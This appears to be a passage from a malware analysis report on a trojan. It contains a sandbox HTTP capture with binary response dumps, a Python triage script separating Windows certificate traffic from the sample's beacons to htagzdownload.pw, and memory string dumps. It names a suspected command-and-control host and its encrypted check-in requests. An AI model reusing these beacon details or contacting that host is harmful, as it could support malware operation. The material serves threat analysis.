lt;/rdf:RDF> </x:xmpmeta> <?xpacket end="r"?>...s...jID
ATx..\.XUW..r....XPTTT...eD4.$.K....8.....c.dF.....$.Q...Q..(..b..]. .
.H."....Y....\.@2.{s.o}..}v;k........2..^oV...d...=......4d...X...F.y.
...@...y..S.....[.......!.Y...."P... 9."A.@.A..<^}P..*.|.u,@.......
T..eV.@U.pY.......9...u.d[..L.m~..........(.......-P...Q.s..;.......1.
4.^-.g.r.....R..q.J....w. --}..<.?.\....5U.th4...m...m..:..Pu N.Hu.
.......f........-**....x..qo%h.(.7.LV.FG..u......M.g..INN...`.R;.|.1.b
N.../~....-..IY..0..5.cdd.D.9w..[@......v..u'X...R...3G...'.k..6..

<<< skipped >>>

GET /pokermatch/podarok200/images/text-200uah.png HTTP/1.1

Accept: image/png, image/svg+xml, image/*;q=0.8, */*;q=0.5
Accept-Language: en-US
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)
Accept-Encoding: gzip, deflate
Host: imglands1.gcdn.co
Connection: Keep-Alive


HTTP/1.1 200 OK
Server: nginx
Date: Thu, 28 Sep 2017 03:12:53 GMT
Content-Type: image/png
Transfer-Encoding: chunked
Connection: keep-alive
Set-Cookie: __cfduid=d9dcf8b80f4d9d2adcb452a1155c7f7a31505113149; expires=Tue, 11-Sep-18 06:59:09 GMT; path=/; domain=.gamesforluckers.com; HttpOnly
ETag: W/"59b2bfc5-2eca"
Last-Modified: Fri, 08 Sep 2017 16:05:25 GMT
CF-Cache-Status: MISS
Expires: Tue, 11 Sep 2018 06:59:09 GMT
Cache-Control: public, max-age=31536000
CF-RAY: 39c8be1d35d14f20-DME
Cache: HIT
X-Cached-Since: 2017-09-11T06:59:09+00:00
X-ID: ix-up-a243
Access-Control-Allow-Origin: *
Cache: HIT
X-Cached-Since: 2017-09-25T14:10:01+00:00
X-ID: m9-up-e237
2eca...PNG........IHDR...>.................PLTE.............uX....U
;.T*....D)...........?.......z..D*.{d.C)....L).|...#..f.gR....E*.y..iT
.A)....za........;.{b..>....jU.?*.jW.F).......jT.@*.lU.}D.w..kT....
kR.......nT.?)..1..M.@*....K1..C....J1.N ........w..H.....z..9....N/..
..[E........=....\!.....~....O/..:.....6.....8..|..p..)..a....~^.p...g
..%.}P..H.."..j..V.J2.................................................
............~ ..........P/..........T..M1.q$.l&.Z,.W-.x"....] ....i'..
..{!....u#.......d)....b).f(.1!.n%._*....I1....mY.s$.G0....bM.?*.D-.^I
.E..N7.we....A,.W?....iU.......fQ.7&.R;.[D.......................l....
dW.....P.....=..3...........x..............$........-.r[..F.{O.oJ..2..
........}......>..C........S..'..2.....Z.....H.W .Q ....t>.q/...
....g7.m.....u.._%..9.i$.M).B4.......}0.yn..i............9......itRNS.
@..@0 ..w...B.`.?..e0@...0a...P0 X O.....P.@..o...p_.....`............
...............p....c................... .IDATx...ilLQ...Ik......SkmA.
.4v..>`.}....}..F..&.:...R. ....$.o. ...3u.3..w.....@...w...F..w...
......V.../T. ...!..t.j.N..]BB.K..T.fe....T._.l.... y.......%?.Z.Ud.W.
.......l..IB)W2j../_.>...'On..[...."Z.b.....lw$X,..c.H2.....a... .d
.G..-..\..S_!._]v...G.....J.0T..9../.(.......n.z.0.~....r.o...........
...'s..f...$...........H~.z...1.6S.NQ....[..t1i.$.....3.V...e.....8.7.
Y.f..-.V.{..Z.j....v...}................J..m;.A. .j.. ..cf..]....Z.<
;.q..I.14.......3......I.q9...._]....}.._..l.8.....Q.Q.Q...s/..=($.rW.
..;_w...!...!.......b.D..$.C$...LW..Q!.A}.....k......%.T..~!.~....

<<< skipped >>>

GET //MEowSDBGMEQwQjAJBgUrDgMCGgUABBS2CA1fbGt26xPkOKX4ZguoUjM0TgQUQMK9J47MNIMwojPX+2yz8LQsgM4CCQDB+8Myi49ySg== HTTP/1.1
Connection: Keep-Alive
Accept: */*
User-Agent: Microsoft-CryptoAPI/6.1
Host: ocsp.godaddy.com


HTTP/1.1 200 OK
Date: Thu, 28 Sep 2017 03:12:35 GMT
Server: Apache
Content-Transfer-Encoding: Binary
Cache-Control: max-age=121568, public, no-transform, must-revalidate
Last-Modified: Thu, 28 Sep 2017 02:45:22 GMT
Expires: Fri, 29 Sep 2017 14:45:22 GMT
ETag: "192de15b904a49dcdaf0850804284d1c5035d7d7"
P3P: CP="IDC DSP COR LAW CUR ADM DEV TAI PSA PSD IVA IVD HIS OUR SAM PUB LEG UNI COM NAV STA"
Content-Length: 1777
Connection: close
Content-Type: application/ocsp-response
0..........0..... .....0......0...0...z0x1.0...U....US1.0...U....Arizo
na1.0...U....Scottsdale1.0...U....GoDaddy Inc.1 0)..U..."Go Daddy Vali
dation Authority - G2..20170928024522Z0l0j0B0... ..........._lkv...8..
f..R34N..@..'..4.0.3..l...,........2..rJ....20170928024522Z....2017092
9144522Z0...*.H................uI.=..&.3}. ...K....?y-..L-B..D.5..x...
..M..:,.e@'...L.A...\....LM.@ax....k{.\.............J.A..z4bN.R.......
fD=\..s.d.......$2...........N.f.?.cQ...u.....O......c].....Tc.W.$.& .
.u..4..P;.j....0.Z...2.....:........a./D.Q>'C)..........k...)m...6.
C9=-.pZ....0...0...0..........3....xXc0...*.H........0..1.0...U....US1
.0...U....Arizona1.0...U....Scottsdale1.0...U....GoDaddy.com, Inc.1-0
..U...$hXXp://certs.godaddy.com/repository/1301..U...*Go Daddy Secure
Certificate Authority - G20...161213070000Z..171213070000Z0x1.0...U...
.US1.0...U....Arizona1.0...U....Scottsdale1.0...U....GoDaddy Inc.1 0).
.U..."Go Daddy Validation Authority - G20.."0...*.H.............0.....
........}...@.H..........j.b.2.c....'eSA.....6""2.hf.m.m9........_N."g
V..{.J"{..0f.W$.Xr....|U.F.!.K.0 .(p......9.I......c.c\.9.xt.v.UN...%.
...,R....ZJ......rz.Z..p...ru.6.....0..t....*...T.W.....?...X...( ..z.
[. .A... z.[>-.y>...nvU...g.wU........ Fh.6F...}..........0..0..
.U.......0.0...U...........0...U.%..0... .......0...U........J!~...}..
..^].....0... .....0......0L..U...E0C0A.?.=.;hXXp://crl.godaddy.com/re
pository/mastergodaddy2issuing.crl0J..U. .C0A0?..`.H...m....000... ...
....."hXXp://crl.godaddy.com/repository/0...*.H.............&...r.

<<< skipped >>>

GET /gdig2s1-455.crl HTTP/1.1
Connection: Keep-Alive
Accept: */*
User-Agent: Microsoft-CryptoAPI/6.1
Host: crl.godaddy.com


HTTP/1.1 200 OK
Date: Thu, 28 Sep 2017 03:12:52 GMT
Server: Apache
Last-Modified: Wed, 27 Sep 2017 03:30:24 GMT
ETag: "ca68-55a2369817400"
Accept-Ranges: bytes
Content-Length: 51816
Cache-Control: max-age=259200
Expires: Sun, 01 Oct 2017 03:12:52 GMT
P3P: CP="IDC DSP COR LAW CUR ADM DEV TAI PSA PSD IVA IVD HIS OUR SAM PUB LEG UNI COM NAV STA"
Connection: close
Content-Type: application/pkix-crl
0..d0..L...0...*.H........0..1.0...U....US1.0...U....Arizona1.0...U...
.Scottsdale1.0...U....GoDaddy.com, Inc.1-0 ..U...$hXXp://certs.godaddy
.com/repository/1301..U...*Go Daddy Secure Certificate Authority - G2.
.170927033023Z..171004033023Z0..a0(....?....\...170330133457Z0.0...U..
.....0'..J&.Cb..X..170717173333Z0.0...U.......0(.......@.<...170331
144754Z0.0...U.......0(.....~.k7.k..170330221728Z0.0...U.......0'..8f.
ucG.*..170402013054Z0.0...U.......0(.....6h......170416202854Z0.0...U.
......0(......wy.KO..170602125026Z0.0...U.......0'....a.......17033122
5354Z0.0...U.......0(....5........170330221540Z0.0...U.......0'..|..r
.....170420121854Z0.0...U.......0'..q/.....7..170415160054Z0.0...U....
...0(....7....I...170511172415Z0.0...U.......0(......w...Q..1705121700
15Z0.0...U.......0(.....k.5.....170526161215Z0.0...U.......0'..3..j..b
...170331161454Z0.0...U.......0(....QF..2.o..170401133354Z0.0...U.....
..0(......f.Y.D..170701215933Z0.0...U.......0'..GL....H...170530154626
Z0.0...U.......0'..h...`.-...170510152515Z0.0...U.......0(.....}..|4..
.170428021807Z0.0...U.......0(........>.4..170331202154Z0.0...U....
...0'..<.....R...170405145254Z0.0...U.......0'..X.]...L...170407165
054Z0.0...U.......0(......&i.d...170401121454Z0.0...U.......0'..5....3
7...170401062654Z0.0...U.......0'..d5....\k..170528171815Z0.0...U.....
..0(....j.I~.j...170331230754Z0.0...U.......0(.....C.......17033120105
4Z0.0...U.......0'..Z.H.`..o..170401201554Z0.0...U.......0'..{u.3..oG.
.170528012815Z0.0...U.......0(.....V.......170330170449Z0.0...U...

<<< skipped >>>

GET /MFEwTzBNMEswSTAJBgUrDgMCGgUABBR8sWZUnKvbRO5iJhat9GV793rVlAQUrb2YejS0Jvf6xCZU7wO94CTLVBoCECdm7lbrSfOOq9dwovyE3iI= HTTP/1.1
Connection: Keep-Alive
Accept: */*
User-Agent: Microsoft-CryptoAPI/6.1
Host: ocsp.usertrust.com


HTTP/1.1 200 OK
Date: Thu, 28 Sep 2017 03:12:58 GMT
Server: Apache
Last-Modified: Mon, 25 Sep 2017 21:19:01 GMT
Expires: Mon, 02 Oct 2017 21:19:01 GMT
ETag: 5A9FD501F956779F1497BE2BD6DE25CED4D61D4F
Cache-Control: max-age=410162,public,no-transform,must-revalidate
X-OCSP-Reponder-ID: rmdccaocsp20
Content-Length: 471
Connection: close
Content-Type: application/ocsp-response
0..........0..... .....0......0...0.........z4.&...&T....$.T...2017092
5211901Z0s0q0I0... ........|.fT...D.b&...e{.z.......z4.&...&T....$.T..
.'f.V.I....p...."....20170925211901Z....20171002211901Z0...*.H........
...............e. ..yR..@o:.......h/D$a.....K.8.w.._.0{.[$.$......eI..
B.{....aV\......^..a.b|.M......NK..o...j.a.W....9...x.\.Y.`.^...A...{.
.>....j....v...".....C=..U8.......H.`....n.%R.`h...O..(</...>
.K\`..1...._..s.]e.......'..f...`..U.........2.\........!.f...


GET /MFMwUTBPME0wSzAJBgUrDgMCGgUABBR+5mrncpqz/PiiIGRsFqEtYHEIXQQUqEpqYwR93brm0Tm3pkVl7/Oo7KECEgNjdonEncxBy5w7PlZkeo4nVg== HTTP/1.1
Connection: Keep-Alive
Accept: */*
User-Agent: Microsoft-CryptoAPI/6.1
Host: ocsp.int-x3.letsencrypt.org


HTTP/1.1 200 OK
Server: nginx
Content-Type: application/ocsp-response
Content-Length: 527
ETag: "776C990E2D90416A6E43881D116898B805FA84DA3E6646542237076A2092BD58"
Last-Modified: Tue, 26 Sep 2017 10:00:00 UTC
Cache-Control: public, no-transform, must-revalidate, max-age=9588
Expires: Thu, 28 Sep 2017 05:52:21 GMT
Date: Thu, 28 Sep 2017 03:12:33 GMT
Connection: keep-alive
0..........0..... .....0......0...0...L0J1.0...U....US1.0...U....Let's
Encrypt1#0!..U....Let's Encrypt Authority X3..20170926102300Z0u0s0K0.
.. ........~.j.r..... dl..-`q.]...Jjc.}....9..Ee........cv....A..;>
Vdz.'V....20170926100000Z....20171003100000Z0...*.H.............%....&
gt;..5"..k..Z...q.9....e]......I...D....1.^6.......k...(_.L.?........6
V'......>.-....!.....H..../a.TX..(...Q...~..~`.....Zf....8V..\j...;
..-v..x...p.w.fO.N".D.AT..].V.....}..?../!..u..3:%...Z?m....aA..X4..].
....^z..l....Qn..L........-...Y...O=..........HTTP/1.1 200 OK..Server:
nginx..Content-Type: application/ocsp-response..Content-Length: 527..
ETag: "776C990E2D90416A6E43881D116898B805FA84DA3E6646542237076A2092BD5
8"..Last-Modified: Tue, 26 Sep 2017 10:00:00 UTC..Cache-Control: publi
c, no-transform, must-revalidate, max-age=9588..Expires: Thu, 28 Sep 2
017 05:52:21 GMT..Date: Thu, 28 Sep 2017 03:12:33 GMT..Connection: kee
p-alive..0..........0..... .....0......0...0...L0J1.0...U....US1.0...U
....Let's Encrypt1#0!..U....Let's Encrypt Authority X3..20170926102300
Z0u0s0K0... ........~.j.r..... dl..-`q.]...Jjc.}....9..Ee........cv...
.A..;>Vdz.'V....20170926100000Z....20171003100000Z0...*.H..........
...%....>..5"..k..Z...q.9....e]......I...D....1.^6.......k...(_.L.?
........6V'......>.-....!.....H..../a.TX..(...Q...~..~`.....Zf....8
V..\j...;..-v..x...p.w.fO.N".D.AT..].V.....}..?../!..u..3:%...Z?m....a
A..X4..].....^z..l....Qn..L........-...Y...O=............

<<< skipped >>>

GET /MFEwTzBNMEswSTAJBgUrDgMCGgUABBRv9GhNQxLSSGKBnMArPUcsHYovpgQUxKexpHsscfrb4UuQdf/EFWCFiRACEAoBQUIAAAFThXNqC4Xspwg= HTTP/1.1
Connection: Keep-Alive
Accept: */*
User-Agent: Microsoft-CryptoAPI/6.1
Host: isrg.trustid.ocsp.identrust.com


HTTP/1.1 200 OK
Date: Thu, 28 Sep 2017 02:58:07 GMT
Content-transfer-encoding: Binary
last-modified: Wed, 27 Sep 2017 21:37:18 GMT
ETag: "196936375e8bf9b887f524c99b256c011efed3bd"
expires: Thu, 28 Sep 2017 21:37:18 GMT
cache-control: max-age=43200,public,no-transform,must-revalidate
Content-Type: application/ocsp-response
Content-Length: 1398
0..r......k0..g.. .....0.....X0..T0........ ..zJ.!.I...u(......2017092
7213718Z0s0q0I0... ........o.hMC..Hb... =G,../.......{,q...K.u...`....
...AB...S.sj.........20170927213718Z....20170928213718Z0...*.H........
.......t.......t.I.........f..Q].1..@....DF.M..h:x.4.`...I61....8=hS..
.......k.....u....#..&..>.#/m......J.B.q.....@...I1.q..c.\NY.....^l
../..k..e.&.L.T.n...>"......lU.....=aj..f.Cq_....E.a..#`q..y.'%K. .
.E..<.......b..c.......sO..."...`).".X.SV!....g1sN.p...).....0...0.
..0..{.........AB...[.s^*(R.40...*.H........0?1$0"..U....Digital Signa
ture Trust Co.1.0...U....DST Root CA X30...170510174115Z..180510174115
Z0..1.0...U....US1 0...U....Digital Signature Trust1.0...U....DST1.0..
.U....DST CA X3 OCSP Signer1$0"..*.H........pki-ops@IdenTrust.com0.."0
...*.H.............0.........C#......}.>.....r....P..%b.b....mh...O
....c.?..1_...O....9.K.6I.#O..6\..`..`~.5..&.!y....;..Y.Fcob.}....nz..
V.......F...{.2.4....AIt........s..lgQ..v...P7....)dk..`...../{..^N...
%-../-.z.|w.9..TFw.(...g....K=6..xr.B9..d{..Lf......T....t.........1ne
.7.t.........F0D0...U.......0.0...U...........0... .....0......0...U.%
..0... .......0...*.H..............p.A....o.....L.c.J.-5.h.nbE.r0\...)
3}..e.Lo.U.......&......l....$...........I...BI..Y.#..y(<h.?....i7.
..d...'k..A....H.$.6BP.*.o..\..`rh....oR.#..._}_.F.V..j..v>.}=Z.I..
O...QOr3.b.3.2.~ht./2t#d..M.}.?..T...$=....C...h....7F....2..]....'.P.
........M.@>.;.W..

<<< skipped >>>

GET /msdownload/update/v3/static/trustedr/en/authrootstl.cab HTTP/1.1
Cache-Control: max-age = 86408
Connection: Keep-Alive
Accept: */*
If-Modified-Since: Fri, 16 Sep 2016 21:16:59 GMT
If-None-Match: "8017f9a85f10d21:0"
User-Agent: Microsoft-CryptoAPI/6.1
Host: VVV.download.windowsupdate.com


HTTP/1.1 200 OK
Cache-Control: max-age=604800
Content-Type: application/vnd.ms-cab-compressed
Last-Modified: Fri, 22 Sep 2017 22:03:52 GMT
Accept-Ranges: bytes
ETag: "014e8acee33d31:0"
Server: Microsoft-IIS/8.5
X-Powered-By: ASP.NET
Content-Length: 53978
Date: Thu, 28 Sep 2017 03:12:22 GMT
Connection: keep-alive
X-CCC: SE
X-CID: 2
MSCF............,...................I.................6K.u .authroot.s
tl.~.F..6..CK...8........i.g.B.A....%.k..5d.NI..RR".nTB.i/.].DQJ.,..".
X.g....N.......u...<.....{ .."'=..x..16...q.;.&'.4....a...e....#M..
.3..c`L.*3..|1.&_L ..._.i.h....J7.k..x.p..jEE....8d#......`....Mo.9AE.
...r<B.v'R....p"....e...f..g.t.<. Bs.x.8a.9;P..AD.._...9..h...g.
..<..!wj..........E1Nx ..^..S...-.l_.!..U.81X$..o.2..iz.a.Ez..S....
^._.<3}.S...l......x.....B..?....P0$....?y....w.`.f.:g0v..ZP..y.U.`
>... ..Z.cy..LU2..N..(......i........ ..`..y..c.Y.fzF0CG.@..Fe2.j.0
......{...]..4;dX..........a...T.0..]....Utv..!..p.M...'T_ b.;.#.\-..]
.T*......d.....`..#_2..........xKB.E.B...y...d.s..lP.;..?#._..#./.L|..
h!......R.....e_o."V..v.......Js.../E..1......3..3..G.8...........lZ.?
.B.)dW...7....?..MhZm.k......iO.....5.....{l.....t}...g..h.C.....v...{
..F.C)vO.3y...wX.M....V.....T......#..q..B.........V...r..H.B .x.tX`l.
<.P...JY...h).e...Z...Z...ku.B.....^.=.`D..|.-...U/l;r.......{-h..g
._B.Y.a.[l..l..'.h.[2.4.\u.....(R8..,.....i....x....w..z..%.=.@#a....!
./....>...g...-.,>..6!.K..e..z..kh.0.n4....9.l2u.C..'.]Nh..c<
.......KM...k.....e......./...F4hn:....u.\.C.M....OI.ZmT..co......C.).
....c...v.r.u....5./...\.....l....7=.`..{....`..>.bUQ..I.........n.
.f.hf..*......M.:[S.W....e_.........c'..A'.$..9.,p..0...... .b0.....k1
.Z.........u4d.....]..p.f......Vk.'z:....f9}8.6...].D6P.....z.).C.-BF.
.F...P.......$..d....c0Z0.......3..K........... .. k....._.:..x.F.C...
.7.P.l..1.%.lCJ.N.."...w... .%?;xT.&_Ew.s.......e.k&..^#.. ..U?.9.

<<< skipped >>>

GET //MEQwQjBAMD4wPDAJBgUrDgMCGgUABBTkIInKBAzXkF0Qh0pel3lfHJ9GPAQU0sSw0pHUTBFxs2HLPaH+3ahq1OMCAxvnFQ== HTTP/1.1
Connection: Keep-Alive
Accept: */*
User-Agent: Microsoft-CryptoAPI/6.1
Host: ocsp.godaddy.com


HTTP/1.1 200 OK
Date: Thu, 28 Sep 2017 03:13:03 GMT
Server: Apache
Content-Transfer-Encoding: Binary
Cache-Control: max-age=120841, public, no-transform, must-revalidate
Last-Modified: Thu, 28 Sep 2017 02:33:05 GMT
Expires: Fri, 29 Sep 2017 14:33:05 GMT
ETag: "939596d17cbb7a2f4b26cb05daf2862a03088c46"
P3P: CP="IDC DSP COR LAW CUR ADM DEV TAI PSA PSD IVA IVD HIS OUR SAM PUB LEG UNI COM NAV STA"
Content-Length: 1697
Connection: close
Content-Type: application/ocsp-response
0..........0..... .....0......0...0......0..1.0...U....US1.0...U....Ar
izona1.0...U....Scottsdale1.0...U....GoDaddy.com, Inc.100...U...'Go Da
ddy Root Validation Authority - G1..20170928023305Z0f0d0<0... .....
.... ......]..J^.y_..F<........L.q.a.=....j...........2017092802330
5Z....20170929143305Z0...*.H.............f.f....O_.nF.....(D. .X......
...Li7..3.kW.sJ]s.\.Dz..^Syq...R..-.."Mw MP..=#.....E.[..5...e.....a..
_M..;lqS...E(T...^..G.x3....pv.q.S->-..c ...' .L.?.w..^4.....1.#|..
.X..%.uR$E3.TPV.Y". .La..}...i...W.v.!.)N....&{./M..I.^.bo..@I^A.....]
..Y....\.&g....$.N!M...b0..^0..Z0..B.......1g....r.0...*.H........0c1.
0...U....US1!0...U....The Go Daddy Group, Inc.110/..U...(Go Daddy Clas
s 2 Certification Authority0...161213070000Z..211213070000Z0..1.0...U.
...US1.0...U....Arizona1.0...U....Scottsdale1.0...U....GoDaddy.com, In
c.100...U...'Go Daddy Root Validation Authority - G10.."0...*.H.......
......0.............}...@.H..........j.b.2.c....'eSA.....6""2.hf.m.m9.
......._N."gV..{.J"{..0f.W$.Xr....|U.F.!.K.0 .(p......9.I......c.c\.9.
xt.v.UN...%....,R....ZJ......rz.Z..p...ru.6.....0..t....*...T.W.....?.
..X...( ..z.[. .A... z.[>-.y>...nvU...g.wU........ Fh.6F...}....
.....0..0...U.......0.0...U...........0...U.%..0... .......0...U......
..J!~...}....^].....0... .....0......0=..U...60402.0...,hXXp://crl.god
addy.com/repository/gdroot.crl0J..U. .C0A0?..`.H...m....000... .......
."hXXp://crl.godaddy.com/repository/0...*.H...............f...gb.dI..F
.72.$.......?/.....5.9-F.=...c....c..Wg.U......j0....A..[O.A>".

<<< skipped >>>
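
Taken together, the capture above mixes three kinds of traffic: the sample's own requests to htagzdownload.pw (a JSON fetch and a form POST carrying an opaque base64 value, both sent without a User-Agent header), Windows CryptoAPI revocation checks and the root-store update, and Internet Explorer pulling images for a pokermatch landing page from imglands1.gcdn.co. The triage script below is an added example and not part of the Lavasoft report. It re-parses a constructed transcription of the request lines and headers shown above (responses dropped, the defanged VVV. host written out as www.), labels each request with heuristics of our own (a Microsoft-CryptoAPI User-Agent together with an OCSP, CRL or authroot path is background PKI traffic; a request with no User-Agent at all is the sample's own HTTP stack; a Mozilla/ User-Agent is the browser), and decodes the POST body. The report renders the base64 character '+' as a space, so the decoder puts it back before decoding; the Content-Length of 51 (7 bytes of "Lyouvi=" plus 44 of base64) confirms it was a single character on the wire.

```python
"""Triage the HTTP requests from the sandbox capture: separate Windows PKI background
traffic and browser content from the sample's own beaconing, and describe the POST body."""
import base64
import re
import string

# Constructed sample: request lines and headers transcribed from the capture in this
# report (responses dropped, '+' restored where the report shows a space).
CAPTURE = """\
GET /Series/Movie/Ragnar/2/UA.json HTTP/1.1
Host: htagzdownload.pw

POST /Series/Conumer1Pirlo.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Host: htagzdownload.pw
Content-Length: 51
Expect: 100-continue
Connection: Keep-Alive

Lyouvi=RCO0bze5gj137V+GKKrirZDEhbKuQIjqi1P/djTx5n4=

GET //MEIwQDA+MDwwOjAJBgUrDgMCGgUABBQdI2+OBkuXH93foRUj4a7lAr4rGwQUOpqFBxBnKLbv9r0FQW4gwZTaD94CAQc= HTTP/1.1
Connection: Keep-Alive
Accept: */*
User-Agent: Microsoft-CryptoAPI/6.1
Host: ocsp.godaddy.com

GET /gdig2s1-455.crl HTTP/1.1
Connection: Keep-Alive
Accept: */*
User-Agent: Microsoft-CryptoAPI/6.1
Host: crl.godaddy.com

GET /msdownload/update/v3/static/trustedr/en/authrootstl.cab HTTP/1.1
Connection: Keep-Alive
User-Agent: Microsoft-CryptoAPI/6.1
Host: www.download.windowsupdate.com

GET /pokermatch/podarok200/images/f-icon-2.png HTTP/1.1
Accept: image/png, image/svg+xml, image/*;q=0.8, */*;q=0.5
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)
Host: imglands1.gcdn.co
"""

REQUEST_LINE = re.compile(r"^(GET|POST|HEAD|PUT) (\S+) HTTP/1\.[01]$")
HEADER_LINE = re.compile(r"^([A-Za-z][A-Za-z0-9-]*): ?(.*)$")
B64_PATH = re.compile(r"^/+[A-Za-z0-9+/]{20,}={0,2}$")   # GET-style OCSP request path
FORM_PAIR = re.compile(r"^([^=&]+)=([^&]+)$")           # single name=value form body


def parse_capture(text):
    """Split a text dump of HTTP requests into dicts with method, path, headers, body."""
    requests = []
    for line in text.splitlines():
        m = REQUEST_LINE.match(line)
        if m:
            requests.append({"method": m.group(1), "path": m.group(2),
                             "headers": {}, "body": ""})
            continue
        if not requests or not line.strip():
            continue                          # preamble or separator line
        h = HEADER_LINE.match(line)
        if h and not requests[-1]["body"]:
            requests[-1]["headers"][h.group(1).lower()] = h.group(2)
        else:
            requests[-1]["body"] += line      # anything else belongs to the body
    return requests


def classify(req):
    """Coarse label for who is talking, from the User-Agent and what is fetched."""
    ua = req["headers"].get("user-agent")
    path = req["path"]
    if ua is None:
        return "suspect-beacon"               # no UA at all: the sample's own HTTP client
    if ua.startswith("Microsoft-CryptoAPI/") and (
            B64_PATH.match(path) or path.endswith(".crl") or path.endswith("authrootstl.cab")):
        return "os-pki-background"            # revocation checks / root store update
    if ua.startswith("Mozilla/"):
        return "browser-content"              # Internet Explorer rendering a page
    return "unclassified"


def describe_form_value(body):
    """Decode a name=<base64> form body and say whether the payload looks like text."""
    m = FORM_PAIR.match(body.strip())
    if not m:
        return None
    raw = base64.b64decode(m.group(2).replace(" ", "+"))   # undo the report's '+' -> ' '
    if not raw:
        return None
    printable = sum(chr(b) in string.printable for b in raw) / len(raw)
    return {"field": m.group(1), "length": len(raw),
            "printable_ratio": round(printable, 2), "head": raw[:4].hex()}


def triage(text):
    """Group requests by class, list hosts the bare client spoke to, decode its bodies."""
    classes, hosts, bodies = {}, set(), []
    for req in parse_capture(text):
        label = classify(req)
        host = req["headers"].get("host", "?")
        classes.setdefault(label, []).append(f"{req['method']} {host}{req['path']}")
        if label == "suspect-beacon":
            hosts.add(host)
            desc = describe_form_value(req["body"]) if req["body"] else None
            if desc:
                bodies.append(desc)
    return {"classes": classes, "suspect_hosts": sorted(hosts), "bodies": bodies}


if __name__ == "__main__":
    import json
    print(json.dumps(triage(CAPTURE), indent=2))
```

On this transcription the only host in the suspect class is htagzdownload.pw, and the POST value decodes to 32 bytes of which well under half are printable ASCII, i.e. an opaque blob rather than a readable key-value beacon; 32 is also a multiple of the 16-byte block size used by common symmetric ciphers, which is consistent with (but does not prove) an encrypted check-in. The base64 bodies of the UA.json and Conumer1Pirlo.php responses have the same character set and the same lost '+' characters, so the same replace-then-decode step applies to them when the full capture is available.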

The Trojan connects to the servers at the following location(s):

iexplore.exe_1748:

.text
`.data
.rsrc
@.reloc
>.uzf
.us;}
IEFRAME.dll
MLANG.dll
iertutil.dll
urlmon.dll
ole32.dll
SHELL32.dll
SHLWAPI.dll
msvcrt.dll
USER32.dll
KERNEL32.dll
ADVAPI32.dll
RegOpenKeyExW
RegCloseKey
GetWindowsDirectoryW
_amsg_exit
_wcmdln
UrlApplySchemeW
PathIsURLW
UrlCanonicalizeW
UrlCreateFromPathW
iexplore.pdb
KEYW
KEYWh
KEYWD
.ENNNG.
a.ry.v
l.igM4
?1%SGf
xh.JW^
.97777"7" " " !
3.... )) 
8888888888888
8888888888
.lPV)
úW1
.ApX/
H.ZAf
ð[U
%s!FK
1YYYY1YY9GEAA=77YRNNNW:.VT1
888777777
Y.hilkRROMLK=C,
..(((($$
3...((((%
3....(.''$
3.2...((((%
33.2....(,'
55323222...
(%&'00443445?
00.,,,4(
000.,,9(
0020..9(
003200;(
(#'( (''''!'!
Microsoft.InternetExplorer.Default
user32.dll
Kernel32.DLL
xfire.exe
wlmail.exe
winamp.exe
waol.exe
sidebar.exe
psocdesigner.exe
np.exe
netscape.exe
netcaptor.exe
neoplanet.exe
msn.exe
mshtmpad.exe
mshta.exe
loader42.exe
infopath.exe
iexplore.exe
iepreview.exe
groove.exe
explorer.exe
dreamweaver.exe
contribute.exe
aol.exe
{28fb17e0-d393-439d-9a21-9474a070473a}
Software\Policies\Microsoft\Windows\CurrentVersion\Internet Settings
DShell32.dll
Software\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\iexplore.exe
Software\Microsoft\Active Setup\Installed Components\>{26923b43-4d38-484f-9b9e-de460746276c}
"%s" %s
Kernel32.dll
\AppPatch\sysmain.sdb
-extoff go.microsoft.com/fwlink/?LinkId=106323
-extoff go.microsoft.com/fwlink/?LinkId=106322
-extoff go.microsoft.com/fwlink/?LinkId=106320
kernel32.dll
{00000000-0000-0000-0000-000000000000}
\\?\Volume
shell:%s
Imaging_CreateWebPagePreview_Perftrack
Browseui_Tabs_Tearoff_BetweenWindows
Frame_URLEntered
Imaging_CreateWebPagePreview
WS_ExecuteQuery
Shdocvw_BaseBrowser_FireEvent_WindowStateChanged
IdleTask_Execution_Time
9.00.8112.16421 (WIN7_IE9_RTM.110308-0330)
IEXPLORE.EXE
Windows
9.00.8112.16421

OPLKIDMWLL.exe_2892_rwx_003C0000_00003000:

2.Cj3

iexplore.exe_4064:

.text
`.data
.rsrc
@.reloc
>.uzf
.us;}
IEFRAME.dll
MLANG.dll
iertutil.dll
urlmon.dll
ole32.dll
SHELL32.dll
SHLWAPI.dll
msvcrt.dll
USER32.dll
KERNEL32.dll
ADVAPI32.dll
RegOpenKeyExW
RegCloseKey
GetWindowsDirectoryW
_amsg_exit
_wcmdln
UrlApplySchemeW
PathIsURLW
UrlCanonicalizeW
UrlCreateFromPathW
iexplore.pdb
KEYW
KEYWh
KEYWD
.ENNNG.
a.ry.v
l.igM4
?1%SGf
xh.JW^
.97777"7" " " !
3.... )) 
8888888888888
8888888888
.lPV)
úW1
.ApX/
H.ZAf
ð[U
%s!FK
1YYYY1YY9GEAA=77YRNNNW:.VT1
888777777
Y.hilkRROMLK=C,
..(((($$
3...((((%
3....(.''$
3.2...((((%
33.2....(,'
55323222...
(%&'00443445?
00.,,,4(
000.,,9(
0020..9(
003200;(
(#'( (''''!'!
Microsoft.InternetExplorer.Default
user32.dll
Kernel32.DLL
xfire.exe
wlmail.exe
winamp.exe
waol.exe
sidebar.exe
psocdesigner.exe
np.exe
netscape.exe
netcaptor.exe
neoplanet.exe
msn.exe
mshtmpad.exe
mshta.exe
loader42.exe
infopath.exe
iexplore.exe
iepreview.exe
groove.exe
explorer.exe
dreamweaver.exe
contribute.exe
aol.exe
{28fb17e0-d393-439d-9a21-9474a070473a}
Software\Policies\Microsoft\Windows\CurrentVersion\Internet Settings
DShell32.dll
Software\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\iexplore.exe
Software\Microsoft\Active Setup\Installed Components\>{26923b43-4d38-484f-9b9e-de460746276c}
"%s" %s
Kernel32.dll
\AppPatch\sysmain.sdb
-extoff go.microsoft.com/fwlink/?LinkId=106323
-extoff go.microsoft.com/fwlink/?LinkId=106322
-extoff go.microsoft.com/fwlink/?LinkId=106320
kernel32.dll
{00000000-0000-0000-0000-000000000000}
\\?\Volume
shell:%s
Imaging_CreateWebPagePreview_Perftrack
Browseui_Tabs_Tearoff_BetweenWindows
Frame_URLEntered
Imaging_CreateWebPagePreview
